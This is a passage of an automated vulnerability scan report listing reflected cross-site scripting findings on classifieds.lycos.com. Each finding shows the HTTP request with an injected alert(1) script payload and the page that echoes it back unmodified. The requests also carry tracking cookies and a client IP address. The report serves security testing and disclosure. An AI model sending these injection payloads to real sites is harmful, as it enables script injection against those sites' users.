P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-roommates/?4386a"><script>alert(1)</script>53f51d5a76c=1&mobile=1" rel="nofollow">
...[SNIP]...

1.41. http://classifieds.lycos.com/housing-rent-short_term/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-short_term/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fc0f"><script>alert(1)</script>175eb4ee6b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-short_term8fc0f"><script>alert(1)</script>175eb4ee6b6/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:08:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:50 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-short_term8fc0f"><script>alert(1)</script>175eb4ee6b6/?mobile=1" rel="nofollow">
...[SNIP]...

1.42. http://classifieds.lycos.com/housing-rent-short_term/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-short_term/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35b35"><script>alert(1)</script>0ac4ae6fe4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-short_term/?35b35"><script>alert(1)</script>0ac4ae6fe4a=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:08:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:07 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-short_term/?35b35"><script>alert(1)</script>0ac4ae6fe4a=1&mobile=1" rel="nofollow">
...[SNIP]...

1.43. http://classifieds.lycos.com/housing-rent-storage/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-storage/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7462"><script>alert(1)</script>626ed5a3760 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-storagef7462"><script>alert(1)</script>626ed5a3760/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:11:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:37 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-storagef7462"><script>alert(1)</script>626ed5a3760/?mobile=1" rel="nofollow">
...[SNIP]...

1.44. http://classifieds.lycos.com/housing-rent-storage/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-storage/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 442de"><script>alert(1)</script>f19e288b98e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-storage/?442de"><script>alert(1)</script>f19e288b98e=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:10:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:10:50 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-storage/?442de"><script>alert(1)</script>f19e288b98e=1&mobile=1" rel="nofollow">
...[SNIP]...

1.45. http://classifieds.lycos.com/housing-rent-vacation/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-vacation/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c00ba"><script>alert(1)</script>d88c6e18e37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-vacationc00ba"><script>alert(1)</script>d88c6e18e37/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:08:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:34 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-vacationc00ba"><script>alert(1)</script>d88c6e18e37/?mobile=1" rel="nofollow">
...[SNIP]...

1.46. http://classifieds.lycos.com/housing-rent-vacation/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-vacation/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec671"><script>alert(1)</script>db069009273 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-vacation/?ec671"><script>alert(1)</script>db069009273=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:07:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:57 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-vacation/?ec671"><script>alert(1)</script>db069009273=1&mobile=1" rel="nofollow">
...[SNIP]...

1.47. http://classifieds.lycos.com/housing-rent/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46c99"><script>alert(1)</script>f65348401a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent46c99"><script>alert(1)</script>f65348401a7/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:43 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent46c99"><script>alert(1)</script>f65348401a7/?mobile=1" rel="nofollow">
...[SNIP]...

1.48. http://classifieds.lycos.com/housing-rent/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f09c9"><script>alert(1)</script>26479ec3b01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent/?f09c9"><script>alert(1)</script>26479ec3b01=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:58:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:58:51 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent/?f09c9"><script>alert(1)</script>26479ec3b01=1&mobile=1" rel="nofollow">
...[SNIP]...

1.49. http://classifieds.lycos.com/housing-sale-commercial-office_space/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-commercial-office_space/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92d68"><script>alert(1)</script>3441bd28421 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-commercial-office_space92d68"><script>alert(1)</script>3441bd28421/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:16:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:16:23 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-commercial-office_space92d68"><script>alert(1)</script>3441bd28421/?mobile=1" rel="nofollow">
...[SNIP]...

1.50. http://classifieds.lycos.com/housing-sale-commercial-office_space/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-commercial-office_space/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db56c"><script>alert(1)</script>b3c0518ee36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-commercial-office_space/?db56c"><script>alert(1)</script>b3c0518ee36=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:15:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:46 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 52962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-commercial-office_space/?db56c"><script>alert(1)</script>b3c0518ee36=1&mobile=1" rel="nofollow">
...[SNIP]...

1.51. http://classifieds.lycos.com/housing-sale-commercial-retail/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-commercial-retail/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40d27"><script>alert(1)</script>55e8d8a9b44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-commercial-retail40d27"><script>alert(1)</script>55e8d8a9b44/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:55 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-commercial-retail40d27"><script>alert(1)</script>55e8d8a9b44/?mobile=1" rel="nofollow">
...[SNIP]...

1.52. http://classifieds.lycos.com/housing-sale-commercial-retail/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-commercial-retail/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45891"><script>alert(1)</script>6e1973139bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-commercial-retail/?45891"><script>alert(1)</script>6e1973139bc=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:15:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:13 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-commercial-retail/?45891"><script>alert(1)</script>6e1973139bc=1&mobile=1" rel="nofollow">
...[SNIP]...

1.53. http://classifieds.lycos.com/housing-sale-condo/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-condo/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b172"><script>alert(1)</script>ee6728714e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-condo7b172"><script>alert(1)</script>ee6728714e9/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-condo7b172"><script>alert(1)</script>ee6728714e9/?mobile=1" rel="nofollow">
...[SNIP]...

1.54. http://classifieds.lycos.com/housing-sale-condo/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-condo/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51bd5"><script>alert(1)</script>cc3baf59798 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-condo/?51bd5"><script>alert(1)</script>cc3baf59798=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:55 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 65440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-sale-condo/?51bd5"><script>alert(1)</script>cc3baf59798=1&mobile=1" rel="nofollow">
...[SNIP]...

1.55. http://classifieds.lycos.com/housing-sale-foreclosure/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-sale-foreclosure/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dc5c"><script>alert(1)</script>96d5591b8e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-sale-foreclosure7dc5c"><script>alert(1)</script>96d5591b8e9/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
